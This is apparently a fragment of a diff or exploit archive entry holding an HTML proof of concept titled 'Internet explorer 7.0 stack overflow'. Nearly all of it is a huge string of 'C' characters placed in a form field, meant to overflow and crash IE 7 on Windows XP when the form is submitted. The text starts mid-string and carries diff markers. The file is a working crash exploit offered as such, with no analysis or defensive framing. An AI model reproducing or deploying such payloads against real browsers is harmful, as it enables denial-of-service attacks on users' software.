CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCccccabcd"> <input type="submit" value="Click here!!!!!"> </form> Juan Pablo Lopez Yacubian \ No newline at end of file +<h1>Internet explorer 7.0 stack overflow</h1> (this work only in window xp) <form name="input" action="http://A" method="get"> <input type="text" name="A" value="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC